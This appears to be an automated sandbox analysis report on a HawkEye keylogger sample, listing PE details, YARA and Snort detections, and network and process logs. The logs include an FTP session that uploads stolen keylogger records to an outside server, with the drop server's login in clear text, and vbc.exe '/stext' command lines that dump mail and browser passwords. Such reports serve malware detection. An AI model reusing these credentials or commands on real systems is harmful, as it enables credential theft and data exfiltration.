                                                                                    Icon Hash:00828e8e8686b000

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x4c76c6
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                    Time Stamp:0x6036EB35 [Thu Feb 25 00:11:33 2021 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:v4.0.30319
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc76740x4f.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x5ec.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000xc56cc0xc5800False0.887886916535data7.81105909328IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0xc80000x5ec0x600False0.436197916667data4.26039178063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0xca0000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_VERSION0xc80900x35cdata
                                                                                    RT_MANIFEST0xc83fc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                    Imports

                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain

                                                                                    Version Infos

                                                                                    DescriptionData
                                                                                    Translation0x0000 0x04b0
                                                                                    LegalCopyrightCopyright 2016 - 2021
                                                                                    Assembly Version1.0.0.0
                                                                                    InternalNameCONSOLESCREENBUFFERINFO.exe
                                                                                    FileVersion1.0.0.0
                                                                                    CompanyName
                                                                                    LegalTrademarks
                                                                                    Comments
                                                                                    ProductNameASM PS
                                                                                    ProductVersion1.0.0.0
                                                                                    FileDescriptionASM PS
                                                                                    OriginalFilenameCONSOLESCREENBUFFERINFO.exe

                                                                                    Network Behavior

                                                                                    Snort IDS Alerts

                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                    02/28/21-10:05:45.532004TCP2020410ET TROJAN HawkEye Keylogger FTP4973121192.168.2.7103.27.200.199

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Feb 28, 2021 10:05:43.160640955 CET4973121192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:43.419292927 CET2149731103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:43.421025038 CET4973121192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:43.680222034 CET2149731103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:43.681391001 CET4973121192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:43.946022987 CET2149731103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:43.946052074 CET2149731103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:43.948708057 CET4973121192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:44.224205971 CET2149731103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:44.224468946 CET4973121192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:44.482297897 CET2149731103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:44.486219883 CET4973121192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:44.746912956 CET2149731103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:44.747503042 CET4973121192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:45.006210089 CET2149731103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:45.006653070 CET4973121192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:45.269675970 CET2149731103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:45.272763968 CET4973235394192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:45.326035023 CET4973121192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:45.531352997 CET3539449732103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:45.531455040 CET4973235394192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:45.532004118 CET4973121192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:45.791039944 CET2149731103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:45.791780949 CET4973235394192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:45.796128988 CET4973235394192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:45.798393965 CET4973235394192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:45.841660976 CET4973121192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:46.052939892 CET3539449732103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:46.055887938 CET3539449732103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:46.056458950 CET3539449732103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:46.058150053 CET3539449732103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:46.058198929 CET2149731103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:46.058229923 CET4973235394192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:46.107297897 CET4973121192.168.2.7103.27.200.199
                                                                                    Feb 28, 2021 10:05:46.838517904 CET3539449732103.27.200.199192.168.2.7
                                                                                    Feb 28, 2021 10:05:46.838846922 CET4973235394192.168.2.7103.27.200.199

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Feb 28, 2021 10:05:07.421943903 CET5183753192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:07.473542929 CET53518378.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:08.193130970 CET5541153192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:08.241946936 CET53554118.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:08.465318918 CET6366853192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:08.522310972 CET53636688.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:09.097626925 CET5464053192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:09.146397114 CET53546408.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:10.009418964 CET5873953192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:10.068387985 CET53587398.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:10.869944096 CET6033853192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:10.920686007 CET53603388.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:11.835720062 CET5871753192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:11.888237000 CET53587178.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:12.800479889 CET5976253192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:12.857666016 CET53597628.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:13.931890011 CET5432953192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:13.981501102 CET53543298.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:14.876555920 CET5805253192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:14.925453901 CET53580528.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:17.997756004 CET5400853192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:18.049096107 CET53540088.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:19.039063931 CET5945153192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:19.087790012 CET53594518.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:20.241424084 CET5291453192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:20.294142962 CET53529148.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:21.446435928 CET6456953192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:21.497881889 CET53645698.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:22.737859964 CET5281653192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:22.786554098 CET53528168.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:23.647866011 CET5078153192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:23.696773052 CET53507818.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:24.617306948 CET5423053192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:24.674698114 CET53542308.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:25.850195885 CET5491153192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:25.900520086 CET53549118.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:27.008938074 CET4995853192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:27.068320036 CET53499588.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:28.040537119 CET5086053192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:28.100461960 CET53508608.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:28.227760077 CET5045253192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:28.285082102 CET53504528.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:29.833426952 CET5973053192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:29.890923023 CET53597308.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:41.571896076 CET5931053192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:41.623699903 CET53593108.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:05:42.740642071 CET5191953192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:05:43.131886959 CET53519198.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:01.786696911 CET6429653192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:01.843863964 CET53642968.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:01.941440105 CET5668053192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:02.001774073 CET53566808.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:03.512547970 CET5882053192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:03.569744110 CET53588208.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:07.887417078 CET6098353192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:07.937706947 CET53609838.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:14.908320904 CET4924753192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:14.977037907 CET53492478.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:31.667437077 CET5228653192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:31.730298042 CET53522868.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:32.254556894 CET5606453192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:32.311799049 CET53560648.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:32.784513950 CET6374453192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:32.847708941 CET53637448.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:32.972779036 CET6145753192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:33.027194023 CET53614578.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:33.519993067 CET5836753192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:33.573194027 CET53583678.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:34.201606989 CET6059953192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:34.262702942 CET53605998.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:34.953306913 CET5957153192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:35.007900953 CET53595718.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:35.969940901 CET5268953192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:36.032183886 CET53526898.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:36.931305885 CET5029053192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:36.991292000 CET53502908.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:37.803549051 CET6042753192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:37.863121033 CET53604278.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:38.519506931 CET5620953192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:38.571108103 CET53562098.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:46.215251923 CET5958253192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:46.269337893 CET53595828.8.8.8192.168.2.7
                                                                                    Feb 28, 2021 10:06:48.036669970 CET6094953192.168.2.78.8.8.8
                                                                                    Feb 28, 2021 10:06:48.094063044 CET53609498.8.8.8192.168.2.7

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                    Feb 28, 2021 10:05:28.040537119 CET192.168.2.78.8.8.80xa6fStandard query (0)200.82.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                    Feb 28, 2021 10:05:42.740642071 CET192.168.2.78.8.8.80xf14aStandard query (0)ftp.triplelink.co.thA (IP address)IN (0x0001)

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                    Feb 28, 2021 10:05:28.100461960 CET8.8.8.8192.168.2.70xa6fName error (3)200.82.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                    Feb 28, 2021 10:05:43.131886959 CET8.8.8.8192.168.2.70xf14aNo error (0)ftp.triplelink.co.th103.27.200.199A (IP address)IN (0x0001)

                                                                                    FTP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                    Feb 28, 2021 10:05:43.680222034 CET2149731103.27.200.199192.168.2.7220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.
                                                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:01. Server port: 21.
                                                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:01. Server port: 21.220-This is a private system - No anonymous login
                                                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                    Feb 28, 2021 10:05:43.681391001 CET4973121192.168.2.7103.27.200.199USER Loggsszzzxxx@triplelink.co.th
                                                                                    Feb 28, 2021 10:05:43.946052074 CET2149731103.27.200.199192.168.2.7331 User Loggsszzzxxx@triplelink.co.th OK. Password required
                                                                                    Feb 28, 2021 10:05:43.948708057 CET4973121192.168.2.7103.27.200.199PASS xpen2000
                                                                                    Feb 28, 2021 10:05:44.224205971 CET2149731103.27.200.199192.168.2.7230-This server supports FXP transfers
                                                                                    230-This server supports FXP transfers230 OK. Current restricted directory is /
                                                                                    Feb 28, 2021 10:05:44.482297897 CET2149731103.27.200.199192.168.2.7504 Unknown command
                                                                                    Feb 28, 2021 10:05:44.486219883 CET4973121192.168.2.7103.27.200.199PWD
                                                                                    Feb 28, 2021 10:05:44.746912956 CET2149731103.27.200.199192.168.2.7257 "/" is your current location
                                                                                    Feb 28, 2021 10:05:44.747503042 CET4973121192.168.2.7103.27.200.199TYPE I
                                                                                    Feb 28, 2021 10:05:45.006210089 CET2149731103.27.200.199192.168.2.7200 TYPE is now 8-bit binary
                                                                                    Feb 28, 2021 10:05:45.006653070 CET4973121192.168.2.7103.27.200.199PASV
                                                                                    Feb 28, 2021 10:05:45.269675970 CET2149731103.27.200.199192.168.2.7227 Entering Passive Mode (103,27,200,199,138,66)
                                                                                    Feb 28, 2021 10:05:45.532004118 CET4973121192.168.2.7103.27.200.199STOR HawkEye_Keylogger_Stealer_Records_414408 2.28.2021 10:13:45 AM.txt
                                                                                    Feb 28, 2021 10:05:45.791039944 CET2149731103.27.200.199192.168.2.7150 Accepted data connection
                                                                                    Feb 28, 2021 10:05:46.058198929 CET2149731103.27.200.199192.168.2.7226-File successfully transferred
                                                                                    226-File successfully transferred226 0.267 seconds (measured here), 5.59 Kbytes per second

                                                                                    Code Manipulations

                                                                                    Statistics

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Start time:10:05:37
                                                                                    Start date:28/02/2021
                                                                                    Path:C:\Users\user\Desktop\Vkdr225E85.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\Vkdr225E85.exe'
                                                                                    Imagebase:0xb80000
                                                                                    File size:811520 bytes
                                                                                    MD5 hash:FF932F457521B993FEFFC92D662166E6
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.257214387.0000000002F81000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:10:05:47
                                                                                    Start date:28/02/2021
                                                                                    Path:C:\Users\user\Desktop\Vkdr225E85.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\Vkdr225E85.exe
                                                                                    Imagebase:0xb70000
                                                                                    File size:811520 bytes
                                                                                    MD5 hash:FF932F457521B993FEFFC92D662166E6
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000004.00000002.513535332.0000000007600000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000004.00000002.513457560.00000000075A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:10:05:57
                                                                                    Start date:28/02/2021
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                                    Imagebase:0x400000
                                                                                    File size:1171592 bytes
                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000006.00000002.276981513.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:10:05:57
                                                                                    Start date:28/02/2021
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                                    Imagebase:0x400000
                                                                                    File size:1171592 bytes
                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.282385616.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:high

                                                                                    Disassembly

                                                                                    Code Analysis

                                                                                    Reset < >